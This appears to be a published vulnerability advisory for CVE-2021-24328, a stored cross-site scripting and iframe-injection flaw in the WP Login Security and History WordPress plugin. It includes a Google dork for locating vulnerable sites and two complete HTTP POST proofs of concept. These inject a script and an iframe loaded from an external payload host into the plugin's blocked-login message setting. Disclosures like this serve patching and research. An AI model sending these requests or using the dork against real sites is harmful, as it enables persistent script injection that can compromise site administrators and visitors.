/*! - # VULNERABILITY: WP Login Security and History WordPress Plugin <= 1.0 - Authenticated Persistent XSS & XFS - # GOOGLE DORK: inurl:/wp-content/plugins/wp-login-security-and-history/ - # DATE: 2021-03-29 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Fakhri Alsadi [ https://www.clogica.com ] - # SOFTWARE VERSION: <= 1.0 - # SOFTWARE LINK: https://wordpress.org/plugins/wp-login-security-and-history/ - # CVSS: AV:N/AC:L/PR:H/UI:N/S:C - # CWE: CWE-79 - # CVE: CVE-2021-24328 */ ### -- [ Info: ] [i] An Authenticated Persistent XSS & XFS vulnerabilities was discovered in the WP Login Security and History plugin through v1.0 for WordPress. [i] Vulnerable parameter(s): &login_blocked_msg=. ### -- [ Impact: ] [~] Malicious JavaScript code or iFrame injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] "> [$] "> ### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Blocker page message: ] [!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 252 Cookie: [admin cookies] can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&Save_Options=++Update+Options++ ### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Blocker page message: ] [!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 258 Cookie: [admin cookies] can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++ ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze